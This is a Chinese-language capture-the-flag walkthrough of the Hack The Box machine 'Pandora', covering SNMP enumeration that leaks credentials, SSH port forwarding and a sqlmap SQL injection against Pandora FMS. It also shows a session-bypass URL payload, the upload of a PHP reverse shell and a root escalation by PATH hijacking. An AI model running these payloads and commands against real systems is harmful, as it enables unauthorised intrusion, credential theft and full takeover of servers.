xChar
·9 months ago

记录时间
2022年4月8日中午之前

msf6 > db_nmap -A -sV 10.10.11.136

[] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-06 05:30 EDT
[
] Nmap: Nmap scan report for 10.10.11.136 (10.10.11.136)
[] Nmap: Host is up (0.36s latency).
[
] Nmap: Not shown: 997 closed tcp ports (reset)
[] Nmap: PORT STATE SERVICE VERSION
[
] Nmap: 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[] Nmap: | ssh-hostkey:
[
] Nmap: | 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
[] Nmap: | 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
[
] Nmap: |_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
[] Nmap: 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
[
] Nmap: |_http-title: Play | Landing
[] Nmap: |_http-server-header: Apache/2.4.41 (Ubuntu)
[
] Nmap: 6543/tcp filtered mythtv
[] Nmap: Aggressive OS guesses: Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Adtran 424RG FTTH gateway (92%), Linux 3.10 (92%), Linux 5.3 - 5.4 (92%)
[
] Nmap: No exact OS matches for host (test conditions non-ideal).
[] Nmap: Network Distance: 2 hops
[
] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[] Nmap: TRACEROUTE (using port 8080/tcp)
[
] Nmap: HOP RTT ADDRESS
[] Nmap: 1 360.68 ms 10.10.14.1 (10.10.14.1)
[
] Nmap: 2 360.74 ms 10.10.11.136 (10.10.11.136)
[] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[
] Nmap: Nmap done: 1 IP address (1 host up) scanned in 83.95 seconds

看看网页里有啥,好像没东西
image.png

切换一个思路,看看有没有子域名,结果也是落空
wfuzz -c -u "http://pandora.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh 33560 -H "HOST:FUZZ.pandora.htb"

ssh端口不知道密码,先不去用
现在好像没啥可利用的 (信息收集! 重中之重)
注意到刚才nmap扫描的是Tcp服务
看看UDP服务呢

nmap -sV -sC -A -sU -oN udp_result -top-ports=20 pandora.htb
[*] exec: nmap -sV -sC -A -sU -oN udp_result -top-ports=20 pandora.htb

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-06 05:53 EDT
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.36s latency).

Bug in snmp-win32-software: no string output.
PORT STATE SERVICE VERSION
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 48fa95537765c36000000000
| snmpEngineBoots: 30
|_ snmpEngineTime: 4h48m20s
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_ System uptime: 4h48m20.46s (1730046 timeticks)
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 10.10.11.136:22 10.10.14.28:56630
| TCP 10.10.11.136:22 10.10.14.32:51682
| TCP 10.10.11.136:35302 1.1.1.1:53
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.1:6010 0.0.0.0:0
| UDP 0.0.0.0:161 :
|_ UDP 127.0.0.53:53 :
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
| 6:
| 9:
| 10:
| 11:
| 12:
| 13:
| 14:
| 15:
| 16:
|_ 17:
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
Service Info: Host: pandora

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 359.51 ms 10.10.14.1 (10.10.14.1)
2 359.76 ms pandora.htb (10.10.11.136)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.72 seconds

注意到161端口开着个snmp
image.png

kali里有个snmpwalk工具
snmpwalk -v 2c pandora.htb -c public > pandora.snmp (不管用。。)

snmpwalk 10.10.11.136 -c public -v 2c (管用)

在这里看到个账号密码
可能是ssh的,连上试试
iso.3.6.1.2.1.25.4.2.1.5.842 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
image.png
ssh [email protected]
password:
HotelBabylon23
image.png

查看对应的端口服务时,发现本地运行了一个web服务
netstat -putlen
image.png
curl pandora.htb
image.png

那么思路来了,我们可以利用端口转发技术,将目标机器的80端口转发到本机的80端口上进行访问。

ssh -L 80:127.0.0.1:80 [email protected]
ssh -L 127.0.0.1:80:127.0.0.1:80 [email protected]
(上面两个都一样,用哪个都行)

image.png

访问
http://127.0.0.1/pandora_console/
image.png
v7.0NG.742_FIX_PERL2020
看见这么个网页 带版本和名字 那必然google 看到一个cve
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5844

https://nvd.nist.gov/vuln/detail/CVE-2020-26518#range-6019001

找到了一个sql注入,咱们去注入吧

sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tsessions_php -C id_session,data --dump
image.png

这里检测到了get注入
image.png

这里看到信息:
matt
image.png

sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --batch --dbms=mysql -D pandora -T tpassword_history -C id_pass,id_user,data_end,password,data_begin --dump
image.png
首先使用如下poc进行跳过
http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

然后直接访问http://127.0.0.1/pandora_console/即可以admin权限进行登录
image.png
image.png

https://link.zhihu.com/?target=https%3A//github.com/pentestmonkey/php-reverse-shell
使用该shell,先保存到本地然后稍微修改一下
修改
$ip
$port
image.png

image.png
传上去后在 http://127.0.0.1/pandora_console/images/php-reverse-shell.php 可以找到shell

image.png

这里监听4444,就是文件中自己设置的端口
image.png
python3 -c "import pty;pty.spawn('/bin/bash')"
利用python
打开个shell
image.png

=================================================================

以下内容不公开
含有flag

usr-flag

matt@pandora:/home/matt$ cat user.txt
cat user.txt
31877bbaf34fd1eef94ad5b501a83052
拿到user的flag

image.png

然后就是提权到root了 现在很多事情都可以干了
find / -perm -u=s -type f 2>/dev/null
又看到了 /usr/bin/pkexec 但是这里用不了
看到一个很诡异的二进制文件
/usr/bin/pandora_backup
下下来 strings pandora_backup看上一看
matt@pandora:/home/matt$ sudo /usr/bin/pandora_backup
sudo /usr/bin/pandora_backup
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
直接利用会错误,我们需要一个更加稳定的shell
image.png

The key fingerprint is:
SHA256:vV7w0pxT635at4mzFf9oWutXYx4tc4hxWqYEPUnA04o matt@pandora

这里生成ssh秘钥
image.png

image.png

在本地新建个id_rsa
把key复制进去
image.png

这里输入刚才设置的passphrase:
123456789a
ssh [email protected] -i id_rsa
image.png
image.png

cd /home/matt/
echo "/bin/bash" > tar
chmod +x tar
export PATH=/home/matt:$PATH

然后运行/usr/bin/pandora_backup文件

matt@pandora:$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:
# whoami&&id
root
uid=0(root) gid=1000(matt) groups=1000(matt)

image.png

=================================================================

root-flag

root@pandora:/root# cat root.txt

image.png

结束时间
2022年4月8日18:26:30

Loading comments...